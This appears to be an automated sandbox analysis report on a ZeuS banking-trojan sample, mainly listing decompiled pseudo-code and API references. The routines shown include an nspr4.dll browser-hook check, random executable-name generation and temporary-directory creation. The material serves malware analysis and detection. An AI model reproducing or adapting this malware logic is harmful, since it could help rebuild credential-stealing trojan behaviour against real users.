Instruction ID: 5aee17a5ccf7a13ed7efcf30dec4f73545527de33865d474c75aaba31fd241c8
Opcode Fuzzy Hash: 6d8c9342c154edf4a2fd15d172b468659fcad3ba5e91eec83aeb719533e99738
Instruction Fuzzy Hash: F21127B250011667CA112A289984ABF3658ABC5355B19003BFB05B72E0DB3C8D4182AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040870B, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 0040871D
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00408747
WSAGetLastError.WS2_32 ref: 0040874E
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040877A

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

closesocket.WS2_32(?), ref: 0040878E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: d79d88f7844b1e9802affada3e9bf7374699f14c24e6e843179cd4f7483394ad
Instruction ID: 3bfece7da5557f3e5294368fa7f95caf1df6d455ea19f5e8efc24b266aa6de1b
Opcode Fuzzy Hash: d79d88f7844b1e9802affada3e9bf7374699f14c24e6e843179cd4f7483394ad
Instruction Fuzzy Hash: C3115171801118BBDB10AFA5DD49CDF7E7CEF453A0B204125F906F61A4D6349E41DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 00418B65, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00418B65(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E0041CAA4() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x4239e4(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 =  *0x4239e0(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x423870);
						if(( *0x423888 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E0040E2A9(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x423888 =  *0x423888 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x423870);
					}
					return _a4;
				}
				goto ( *0x4239e0);
			}

0x00418b6f
0x00418b7a
0x00418b7e
0x00418b88
0x00418b98
0x00418b9e
0x00418ba3
0x00418bbc
0x00418bc9
0x00418bce
0x00418bde
0x00418be9
0x00418be0
0x00418be2
0x00418be2
0x00418bed
0x00418bef
0x00418bef
0x00418bed
0x00418bf7
0x00418bf7
0x00418c04
0x00418c04
0x00418b72

APIs

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

EnterCriticalSection.KERNEL32(00423870), ref: 00418BBC
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00418BD6
LeaveCriticalSection.KERNEL32(00423870), ref: 00418BF7

Strings

nspr4.dll, xrefs: 00418BD0
p8B, xrefs: 00418BB6

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll$p8B
API String ID: 3081114022-2481706081
Opcode ID: b1874c3d90e7a9337c99e34f607db2f9917676b2622ce5c6ab961ceafca2dcb7
Instruction ID: 35e934171f5e2ec1cfc5913f656fec0e042482b958f38a7548a20fafb374fd5a
Opcode Fuzzy Hash: b1874c3d90e7a9337c99e34f607db2f9917676b2622ce5c6ab961ceafca2dcb7
Instruction Fuzzy Hash: 1D11A3B1204219ABCB215F11EC44BE77BA8EF45755F14402FFC01A7222CB79E9C2CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004177CD, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004177CD(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x4239b0 & 0x00000004) == 0 || E0041CAA4() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x42323c);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E00405222( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x004177d8
0x004177dc
0x0041784d
0x00000000
0x004177e7
0x004177f3
0x004177f7
0x00000000
0x004177fe
0x00417802
0x00417806
0x0041780e
0x0041780e
0x00417817
0x0041781d
0x0041782d
0x00417835
0x0041783c
0x0041783f
0x00417845
0x00417849
0x00000000
0x00417849
0x004177f7

APIs

GetUpdateRect.USER32 ref: 00417854

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

TlsGetValue.KERNEL32 ref: 004177ED
SaveDC.GDI32(?), ref: 0041781D
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041782D
RestoreDC.GDI32(?,00000000), ref: 0041783F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: cd8456fc314b3bccaff62e2128320fe87c4a858a8782ac5ddfd2330f6f6320fd
Instruction ID: 6689aaa6ee9f87e95d0a64a7fe1afaa00f3e46dd598058abb6d248534c18f8a7
Opcode Fuzzy Hash: cd8456fc314b3bccaff62e2128320fe87c4a858a8782ac5ddfd2330f6f6320fd
Instruction Fuzzy Hash: B7119A31044344EFCB22AF60EC48FDB7BB9EF08711F00882AFA4692661C37894C0CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004179C2, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004179C2() {
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x423244);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x423240 && _v32.wParam == 0xfffffffc) {
						_t17 = E00417275( *0x423248 + 0x114, _t19, _t21, 0x423238, _v32.lParam, 1);
						_t19 =  *0x423248;
						 *((char*)( *0x423248 + 0x124)) = _t17;
						SetEvent( *0x423244);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x004179d6
0x004179e8
0x00417a37
0x00417a42
0x00417a47
0x00000000
0x00000000
0x004179f4
0x00000000
0x00000000
0x00417a00
0x00417a1e
0x00417a23
0x00417a29
0x00417a35
0x00417a35
0x00417a00
0x00417a55

APIs

GetCurrentThread.KERNEL32 ref: 004179CF
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041D51E), ref: 004179D6
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,0041D51E), ref: 004179E8
SetEvent.KERNEL32(00423238,?,00000001), ref: 00417A35
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00417A42

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: 3114360d17cc64aa443792f11790df72001a4af6065ca9dddbe3c861aa70de6a
Instruction ID: f49ca340768a302a4ff21ae413e600596b057eb3893a4cc8981c6a1b2f61f3e4
Opcode Fuzzy Hash: 3114360d17cc64aa443792f11790df72001a4af6065ca9dddbe3c861aa70de6a
Instruction Fuzzy Hash: 8801F931204200E7CA209F69ED45F9A7B74DB45770F10036AF660961F0C7399541C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E862, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040EC9B,00000000), ref: 0040E868
ReleaseMutex.KERNEL32(?), ref: 0040E89C
IsWindow.USER32(?), ref: 0040E8A3
PostMessageW.USER32(?,00000215,00000000,?), ref: 0040E8BD
SendMessageW.USER32(?,00000215,00000000,?), ref: 0040E8C5

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: c95192b305a22dde4d3a31201a034f79c5eef2f8e5fd0a9afac7192a4567969f
Instruction ID: b7e012eebce3405f3ba879d7db877b1c4a3faecc54a9f1a724097f110de9bd89
Opcode Fuzzy Hash: c95192b305a22dde4d3a31201a034f79c5eef2f8e5fd0a9afac7192a4567969f
Instruction Fuzzy Hash: C8F06934204700DFC3209F25D848D66BBB4FB89711B048A7DF896A37B0C770A844CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00409565, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409565(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0040656B(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E0040651F();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E0040651F() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0040651F() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E0040656B(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x0040957a
0x0040957c
0x0040957f
0x00409584
0x0040958e
0x0040959c
0x004095a3
0x00409590
0x00409590
0x00409593
0x00409593
0x004095a6
0x004095a8
0x004095ab
0x004095b0
0x004095bc
0x004095bf
0x004095c3
0x004095cf
0x004095dd
0x004095e4
0x004095d1
0x004095d1
0x004095d4
0x004095d4
0x004095e7
0x004095e7
0x004095ee
0x00409604
0x00409607
0x00409638
0x00409625
0x00409627
0x00409628
0x00409628
0x00409640
0x00409644
0x00409645
0x00409648
0x00409651
0x00409651
0x00409658
0x00409673
0x0040965e
0x0040965e
0x00409661
0x00409665
0x0040966b
0x0040966e
0x0040966f
0x00000000
0x00000000
0x00409671
0x00000000
0x0040966f
0x00409665
0x00409676
0x00409676
0x0040967c
0x00409680
0x00409686
0x0040968c
0x0040968c
0x00409693

APIs

Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00409686

Strings

bcdfghklmnpqrstvwxz, xrefs: 00409584
aeiouy, xrefs: 00409593, 0040959C, 004095D4, 004095DD
.exe, xrefs: 00409570

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CharCountTickUpper
String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-3410450461
Opcode ID: a53e8278b3b58a00e491ca46b6a46092f013c341d66e09cbab7f214665e92490
Instruction ID: 63dbc39059de59c65e329b6ba897f894b0a12b739c0e5dbad260fcc0baf44038
Opcode Fuzzy Hash: a53e8278b3b58a00e491ca46b6a46092f013c341d66e09cbab7f214665e92490
Instruction Fuzzy Hash: 19318F71D00609ABCB119FA5C4856AEBBB4EF44304F15847BD812BB2C2D77DDE41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413CDB, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00413CDB(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E0040F34A(_t28,  &_v116);
				_t30 = 0x61;
				E0040F34A(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E0040930A(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00413A93(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004051E6(_v12);
					}
					_push(0xcb);
					return E0041293E(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E0040F34A(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040A91B( &_v636,  &_v16, _t68, 1, 2, E00413AED,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00413cdb
0x00413cdb
0x00413cf0
0x00413cfa
0x00413cfb
0x00413d05
0x00413d06
0x00413d19
0x00413d24
0x00413d2c
0x00413d2e
0x00413d30
0x00413d3d
0x00413d4e
0x00413d4e
0x00413d30
0x00413d56
0x00413dbe
0x00413dbe
0x00000000
0x00413dd5
0x00413dc3
0x00000000
0x00413d58
0x00413d5a
0x00413d5d
0x00413d5e
0x00413d65
0x00413d6c
0x00413d73
0x00413d7a
0x00413d7d
0x00413d7f
0x00413d7f
0x00413d8d
0x00413d93
0x00413d95
0x00413da7
0x00413db0
0x00413db0
0x00413db5
0x00413db6
0x00413dbb
0x00000000
0x00413dbb

APIs

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 00413D3D
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00413D8D

Strings

#, xrefs: 00413D65
&, xrefs: 00413D73

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: af361530765df1ac0f1c1aef78eab0b445f8e063f527b8b5416979d442620232
Instruction ID: 214b6e7a3599988819771498a99bed2cb4bbc81edda79e9dabce594bd7e0e267
Opcode Fuzzy Hash: af361530765df1ac0f1c1aef78eab0b445f8e063f527b8b5416979d442620232
Instruction Fuzzy Hash: 39316DB2D00218AADF10AEE1AC89EDE777CEB04319F10457AF601F7190D6786B898B94

Uniqueness

Uniqueness Score: -1.00%

Function 0041458B, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041458B(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00405299( &_v12,  &_v12, 0, 8);
				_t28 = 0x77;
				E0040F34A(_t28,  &_v120);
				_t30 = 0x78;
				E0040F34A(_t30,  &_v44);
				_t55 =  &_v644;
				_t35 = E0040930A(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
						E0041432E(_t65,  &_v1164,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E004051E6(_v12);
					}
					_push(0xcb);
					return E0041293E(_t54, _v12, 0x7a);
				} else {
					_t60 =  &_v68;
					_t39 = 0x79;
					E0040F34A(_t39, _t60);
					_v28 = 0x1a;
					_v24 = 0x26;
					_v20 = 0x23;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v644;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040A91B( &_v644,  &_v16, _t68, 1, 2, E00414366,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x0041458b
0x0041458b
0x004145a0
0x004145aa
0x004145ab
0x004145b5
0x004145b6
0x004145c9
0x004145d4
0x004145dc
0x004145de
0x004145e0
0x004145ed
0x004145fe
0x004145fe
0x004145e0
0x00414606
0x0041466e
0x0041466e
0x00000000
0x00414685
0x00414673
0x00000000
0x00414608
0x0041460a
0x0041460d
0x0041460e
0x00414615
0x0041461c
0x00414623
0x0041462a
0x0041462d
0x0041462f
0x0041462f
0x0041463d
0x00414643
0x00414645
0x00414657
0x00414660
0x00414660
0x00414665
0x00414666
0x0041466b
0x00000000
0x0041466b

APIs

Part of subcall function 0040930A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041C0F5,?,?,00000104,.exe,00000000), ref: 0040931F

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 004145ED
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0041463D

Strings

&, xrefs: 0041461C
#, xrefs: 00414623

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: fb1fcc6b599b22b6f88ed84e9769d99373cddc3cd047dc1b700b94009f82151f
Instruction ID: f45ae4ae41c08c08f0bb2dadcaa3525976364251704845c549422b65bc96e149
Opcode Fuzzy Hash: fb1fcc6b599b22b6f88ed84e9769d99373cddc3cd047dc1b700b94009f82151f
Instruction Fuzzy Hash: 12314FB2D00218AADF509AA19C89EDF777CEB44318F10457AF605F7180DA786A898BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040983F, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040983F(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				char _v268;
				char _v280;
				char _v284;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				char* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t46;
				signed int _t50;
				void* _t51;
				signed int _t52;
				void* _t54;

				_t54 = (_t52 & 0xfffffff8) - 0x118;
				_t46 = __ecx;
				_t24 = E00405222( &_v284, _a4, 0x10);
				_v296 = _v296 ^ _t24;
				_v292 = _v292 ^ _t24;
				_v290 = _v290 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					_t10 = _t26 + 0xc; // 0x423c28
					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t10);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00405222( &_v268, _a12, 0x102);
					E00406662( &_v280, _t41,  &_v296, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t50);
							E00405587(_t50, _t42, _t46);
							_t46 = _t46 + _t50 * 2;
						}
					}
				}
				_t29 =  &_v284;
				__imp__StringFromGUID2(_t29, _t46, 0x28);
				return _t29;
			}

0x00409845
0x00409852
0x00409859
0x0040985e
0x00409862
0x0040986a
0x0040986f
0x00409871
0x00409873
0x00409873
0x00409877
0x0040987b
0x0040987f
0x00409881
0x00409881
0x00409883
0x00409884
0x0040988d
0x0040989c
0x004098ac
0x004098ac
0x004098b5
0x004098b8
0x004098ba
0x004098bb
0x004098c9
0x004098ce
0x00000000
0x004098bd
0x004098be
0x004098c0
0x004098c5
0x004098d0
0x004098d0
0x004098d5
0x004098da
0x004098da
0x004098be
0x004098bb
0x004098e0
0x004098e5
0x004098f0

APIs

StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,77E49EB0), ref: 004098E5

Strings

Global\, xrefs: 004098C0
Local\, xrefs: 004098C9
(<B, xrefs: 00409873

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: FromString
String ID: (<B$Global\$Local\
API String ID: 1694596556-3709893674
Opcode ID: 499d82d82ff1a61b49700400b8527ddd0283d798db0361c206ef461b4f62b386
Instruction ID: 7161f8ffbd1ff4f8598d19e9a28633fef4e7433de9ddb5ed9ea82c69b161057f
Opcode Fuzzy Hash: 499d82d82ff1a61b49700400b8527ddd0283d798db0361c206ef461b4f62b386
Instruction Fuzzy Hash: 6B115232124309A7C714EE349805AEB7799EB85714F04CD3FF482E62C2DBB8C904CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5F2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A5F2(WCHAR* _a4) {
				short _v524;
				char _v1044;
				void* __edi;
				void* _t11;
				void* _t19;
				void* _t20;

				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L6:
					return 0;
				}
				_t19 = 0;
				while(1) {
					_push(E0040651F());
					_push(L"tmp");
					_t18 =  &_v1044;
					_t11 = E00405ED9(_t10, 0x104,  &_v1044, L"%s%08x");
					_t20 = _t20 + 0xc;
					if(_t11 == 0xffffffff) {
						goto L6;
					}
					if(E0040AA77(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
						_t19 = _t19 + 1;
						if(_t19 < 0x64) {
							continue;
						}
						goto L6;
					} else {
						return 1;
					}
				}
				goto L6;
			}

0x0040a615
0x0040a66b
0x00000000
0x0040a66b
0x0040a617
0x0040a619
0x0040a61e
0x0040a61f
0x0040a62e
0x0040a634
0x0040a639
0x0040a63f
0x00000000
0x00000000
0x0040a654
0x0040a665
0x0040a669
0x00000000
0x00000000
0x00000000
0x0040a673
0x00000000
0x0040a673
0x0040a654
0x00000000

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0040A609

Part of subcall function 0040651F: GetTickCount.KERNEL32 ref: 0040651F

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040A65B

Strings

tmp, xrefs: 0040A61F
%s%08x, xrefs: 0040A624

